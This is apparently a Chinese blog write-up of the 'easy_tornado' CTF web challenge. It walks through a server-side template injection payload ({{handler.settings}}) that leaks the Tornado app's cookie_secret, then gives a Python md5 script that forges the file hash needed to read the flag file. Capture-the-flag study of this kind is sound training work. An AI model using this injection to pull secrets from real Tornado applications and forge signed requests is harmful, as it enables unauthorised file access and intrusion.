漏洞复现-easy_tornado

最新推荐文章于 2024-04-24 23:01:31 发布
最新推荐文章于 2024-04-24 23:01:31 发布
阅读量275 收藏
点赞数
分类专栏: 漏洞复现 文章标签: tornado python
原文链接:https://adworld.xctf.org.cn/task/writeup?type=web&id=5422&number=3&grade=1&page=1
版权

[环境]

windows

[工具]

Firefox

[步骤]

tornado是python中的一个web应用框架。

拿到题目发现有三个文件:

flag.txt

/flag.txt
flag in /fllllllllllllag

发现flag在/fllllllllllllag文件里;

welcome.txt

/welcome.txt
render

render是python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面。

hints.txt

/hints.txt
md5(cookie_secret+md5(filename))

filehash=md5(cookie_secret+md5(filename)) 现在filename=/fllllllllllllag,只需要知道cookie_secret的既能访问flag。

测试后发现还有一个error界面,格式为/error?msg=Error,怀疑存在服务端模板注入攻击 (SSTI)

尝试/error?msg={{datetime}} 在Tornado的前端页面模板中,datetime是指向python中datetime这个模块,Tornado提供了一些对象别名来快速访问对象,可以参考Tornado官方文档

通过查阅文档发现cookie_secret在Application对象settings属性中,还发现self.application.settings有一个别名

RequestHandler.settings
An alias for self.application.settings.

handler指向的处理当前这个页面的RequestHandler对象, RequestHandler.settings指向self.application.settings, 因此handler.settings指向RequestHandler.application.settings。

构造payload获取cookie_secret

/error?msg={{handler.settings}}

'cookie_secret': 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%wqj@PA![VtR#geh9UHsbnL_+mT5N~J84*r'

计算filehash值:

import hashlib

def md5(s):
 md5 = hashlib.md5() 
 md5.update(s) 
 return md5.hexdigest()

def filehash():
 filename = '/fllllllllllllag'
 cookie_secret = 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%wqj@PA![VtR#geh9UHsbnL_+mT5N~J84*r'
 print(md5(cookie_secret+md5(filename)))

if __name__ == '__main__':
 filehash()

payload:

file?filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(/fllllllllllllag))

成功获取flag。

_s1mple
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
easy_tornado
nole_的博客
01-22 251
进入网址,看到一下内容 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mLMHFZFt-1611296176433)(C:\Users\Noel丶\Desktop\论坛\Easy_tornado\image-20210122125417272.png)] 首先,习惯性的访问一下 robots.txt,看一下有没有什么好东西 看来不存在 返回,f12,发body中的三行文字,并且分别指向三个地址 ,依次打开 首先,很容易的观察到,我们请求的网址都是由filename以及 f
msg提示错误方法怎么用
weixin_42610671的博客
02-11 1670
如果您在使用软件时遇到了 "msg error" 的提示,您可以以下几种方法尝试解决问题: 检查您的输入:确保您的输入是正确的,并且符合系统的要求。 重新启动计算机:有时候,重新启动计算机可以解决一些技术问题。 更新软件:如果您正在使用的软件是最新版本,请确保系统上安装了所有更新。 检查操作系统:如果您的操作系统有更新,请将其安装在您的计算机上。 寻求技术支持:如果您仍然无法解决问题,请...
查看openssh版本_OpenSSH命令注入漏洞(CVE202015778)
weixin_39707536的博客
12-06 1605
OpenSSH命令注入漏洞(CVE-2020-15778)目录漏洞描述漏洞等级漏洞影响版本漏洞建议▶漏洞描述 OpenSSH是用于使用SSH协议进行远程登录的一个开源实。通过对交互的流量进行加密防止窃听,连接劫持以及其他攻击。OpenSSH由OpenBSD项目的一些开发人员开发, 并以BSD样式的许可证提供,且已被集成到许多商业产品中。 2020年6月9日,研...
tornado模板注入
最新发布
m0_74196038的博客
04-24 351
服务器端模板注入是指攻击者能够利用服务端所采用的模板(框架)语法将恶意有效负载注入模板中,然后在服务器端执行该模板。我在最后拿到cookie然后进行md5的时候,找了一个网站进行加盐的md5,但是结果不对,可能是我哪里搞错了。tornado是python当中的一个模板,因此这个漏洞是归属于SSTI(服务器模板漏洞),所谓的模板其实就是一种框架,python当中常见的模板漏洞还有flask。这是我在做一道ctf题目当中遇到的,不太会,所以浅浅学习了一下,跟大家分享。在Tornado里,应用的设置可以通过。
easy_tornado
AsagiRiAsagi的博客
01-03 809
Easy_tornado分析 问题与解答 cookie_secret是什么? 答:根据Tornado官方文档的解释:这是settings中关于认证和安全方面的一个配置参数。 settings又是什么? 答:是一个python字典。通常用作于application的配置项。 application是什么? 答:这个问题会比较难直接回答。这需要先理解一个tornado web应用是如何工作的。 我们先看Tornado官方给的一个Hello World程序的例子: import tornado.iol
Tornado 使用经验
01-08 1439
最近在做一个网站的后端开发。因为初期只有我一个人做,所以技术选择上很自由。在 web 服务器上我选择了Tornado。虽然曾经也读过它的源码,并做过一些小的 demo,但毕竟这是第一次在工作中使用,难免又发了一些值得分享的东西。 首先想说的是它的安全性,这方面确实能让我感受到它的良苦用心。这主要可以分为两点: 防范跨站伪造请求(Cross-site request forge
VxWork-And-Tornado.rar_Tornado vxwork_tornado_tornado and vxwork
09-19
Tornado是与VxWorks配套的集成开发环境(IDE),它提供了全面的开发、调试和测试工具,使得开发者能够便捷地进行VxWorks应用程序的编写、构建、调试和维护。Tornado包括项目管理器、源代码编辑器、编译器、链接器、...
tornado-6.0.3-cp38-cp38-win_amd64.whl
02-11
tornado-6.0.3-cp38-cp38-win_amd64.whl官网下载很慢,把自己下载的一些上传给大家下载,速度更快。
tornado-4.5.2-cp36-cp36m-win_amd64
10-08
首先,"tornado-4.5.2-cp36-cp36m-win_amd64"这个标题暗示了我们正在处理的是Tornado的4.5.2版本,它是为Python 3.6编译的,并且适用于64位Windows操作系统(AMD64架构)。这表明该框架已经过精心优化,能够充分利用...
buuojweb刷题wp详解及知识整理—-【护网杯】easy_tornado(模板注入+md5)
01-20
写在前面 服务端模板注入也是一种注入攻击(简称为SSTL) 这又涉及到了本人的知识盲区 借这个题学习补充一下知识 自己走过的路加wp辅助 信息收集加思路推理 ...回显 render 而且url处有异常 同理测试其他选项 ...
tornado-6.1-cp310-cp310-win_amd64
08-19
tornado-6.1-cp310-cp310-win_amd64
攻防世界easytornado-tornado模板注入
yuanxu8877的博客
11-28 371
攻防世界easytornado-tornado模板注入
tornado系列五:cookie安全
BOKE
05-06 4399
1、通过签名防止cookie篡改 import tornado.httpserver import tornado.ioloop import tornado.web import tornado.options from tornado.options import define, options define("port", default=8000, help="run on the
攻防世界 web进阶区 easytornado
m0_51395584的博客
06-17 419
攻防世界 web进阶区 easytornado Tornado 框架的漏洞利用
[护网杯 2018]easy_tornado
yzl_007的博客
02-22 363
tornado模板注入 给到了如下一些信息 /flag.txt flag in /fllllllllllllag /welcome.txt render /hints.txt md5(cookie_secret+md5(filename)) url形如 :http://35848a5d-982a-45c9-a772-1b59e317746f.node3.buuoj.cn/file?filename=/flag.txt&filehash=32c8987c242bb2c5f0b0da175550d
攻防世界 easytornado 详解
xmj818719的博客
03-28 848
Tornado框架 第一任务先找cookie_secret 没什么头绪,直接访问http://111.200.241.244:59809/file?filename=/fllllllllllllag&filehash=7bc08cbde1fe13f5898f51b5470dc21d 回想起前段时间做的py模板注入,用同样的方法试一下 还是无果 最后动用谷歌寻找框架漏洞 网上搜罗框架漏洞资料,资料大概意思是可用 handler.settings 访问配置文件 http...
【BUUCTF之easy_tornado】
qq_40646572的博客
05-15 893
打开题目网站,发存在三个文件,都打开看了下,在hint.txt文件中发提示。 在flag.txt文件中也有提示flag在/fllllllllllllag文件中。 整理下思路,这道题其实关键点在于hint.txt文件中的cookie_secret值。 但考虑到题目名中包含tornado这个关键词,百度下发这是一个python的web框架,搜索下是否存在可以读取配置文件的漏洞,发这个框架存在可以读取配置文件的漏洞。 想到还有一个welcome.txt文件,上面提示到render,渲染。想到ss..
CTF模板注入
weixin_43952190的博客
07-30 4188
模板注入赛题 1. [护网杯 2018]easy_tornado 进入后三个链接 /flag.txt # flag in /fllllllllllllag /welcome.txt #提示render(渲染) /hint.txt #提示md5(cookie_secret+md5(filename)) url上两个参数:filename&filehash 根据提示,要查看flag,已经知道了文件名,filehash也知道了构

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值